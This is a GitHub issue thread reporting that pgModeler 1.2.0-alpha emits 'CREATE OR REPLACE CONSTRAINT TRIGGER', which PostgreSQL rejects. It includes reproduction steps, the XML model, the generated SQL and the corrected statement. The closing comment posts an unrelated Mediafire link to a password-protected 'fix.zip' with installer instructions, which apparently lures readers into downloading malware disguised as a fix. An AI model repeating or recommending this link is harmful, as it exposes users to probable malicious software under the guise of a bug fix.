### ISSUE TITLE
Constraint Trigger generates invalid SQL

### ISSUE THREAD

**Issue by Nithanim-Work** [pgmodeler/pgmodeler#1910]
**Bug description**
Defining a `CONSTRAINT TRIGGER` on a table generates the invalid SQL: `CREATE OR REPLACE CONSTRAINT TRIGGER [...]`.
Postgres error: `[0A000] ERROR: CREATE OR REPLACE CONSTRAINT TRIGGER is not supported`

From the  [documentation](https://www.postgresql.org/docs/15/sql-createtrigger.html): 
> Currently, the OR REPLACE option is not supported for constraint triggers.

**How to reproduce**
* Create a table
* Create a function returning `trigger`. Example body: `BEGIN RETURN NULL; END`
* Create a trigger on the Table
  * Type: Constraint
  * Events: Select any; e.g. Insert
  * Function: Select the created function
* Generate the SQL and execute it on a server

<details>
<summary>Model</summary>

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
CAUTION: Do not modify this file unless you know what you are doing.
 Unexpected results may occur if the code is changed deliberately.
-->
<dbmodel pgmodeler-ver="1.2.0-alpha" use-changelog="false" max-obj-count="4"
	 last-position="0,0" last-zoom="1"
	 default-schema="public" default-owner="postgres"
	 layers="Default layer"
	 active-layers="0"
	 layer-name-colors="#000000"
	 layer-rect-colors="#b4b4b4"
	 show-layer-names="false" show-layer-rects="false">
<database name="new_database" is-template="false" allow-conns="true">
</database>

<schema name="public" layers="0" fill-color="#e1e1e1" name-color="#000000" sql-disabled="true">
</schema>

<table name="test_table" layers="0" collapse-mode="2" max-obj-count="1" z-value="0">
	<schema name="public"/>
	<position x="1098" y="411"/>
</table>

<function name="test_function"
		window-func="false"
		returns-setof="false"
		behavior-type="CALLED ON NULL INPUT"
		function-type="VOLATILE"
		security-type="SECURITY INVOKER"
		parallel-type="PARALLEL UNSAFE"
		execution-cost="1"
		row-amount="0">
	<schema name="public"/>
	<role name="postgres"/>
	<language name="plpgsql"/>
	<return-type>
	<type name="trigger" length="0"/>
	</return-type>
	<definition> <![CDATA[BEGIN
return NULL;
END
]]> </definition>
</function>

<trigger name="test_trigger" firing-type="AFTER" per-line="true" constraint="true"
	 ins-event="true" del-event="false" upd-event="false" trunc-event="false"
	 table="public.test_table">
		<function signature="public.test_function()"/>
</trigger>

</dbmodel>
```

</details>

<details>
<summary>SQL</summary>

```sql
-- DROP TABLE IF EXISTS public.test_table CASCADE;
CREATE TABLE public.test_table (

);
-- ddl-end --

-- object: public.test_function | type: FUNCTION --
-- DROP FUNCTION IF EXISTS public.test_function() CASCADE;
CREATE OR REPLACE FUNCTION public.test_function ()
	RETURNS trigger
	LANGUAGE plpgsql
	VOLATILE 
	CALLED ON NULL INPUT
	SECURITY INVOKER
	PARALLEL UNSAFE
	COST 1
	AS $$
BEGIN
return NULL;
END

$$;
-- ddl-end --
ALTER FUNCTION public.test_function() OWNER TO postgres;
-- ddl-end --

-- object: test_trigger | type: TRIGGER --
-- test_trigger ON public.test_table CASCADE;
CREATE OR REPLACE CONSTRAINT TRIGGER test_trigger
	AFTER INSERT 
	ON public.test_table
	NOT DEFERRABLE 
	FOR EACH ROW
	EXECUTE PROCEDURE public.test_function();
-- ddl-end --
```

</details>

**Expected behavior**
Generate SQL that executes without error. Specifically leaving out the `OR REPLACE`
Example:
```sql
CREATE CONSTRAINT TRIGGER test_trigger
    AFTER INSERT
    ON public.test_table
    NOT DEFERRABLE
    FOR EACH ROW
EXECUTE PROCEDURE public.test_function();
```

**Screenshots**
~_If applicable, add screenshots to help explain your problem._~

**Info about your desktop**
 - OS: Windows 11
 - Version: 23H2
 - Window manager: -
 - pgModeler version: v1.2.0-alpha
 - Qt version: 6.7.2

**Stacktrace / Debug info**
~_If pgModeler crashed after the bug raised attach the stacktrace below_~

**Additional info**

Postgres server: `PostgreSQL 15.6 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0, 64-bit`

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
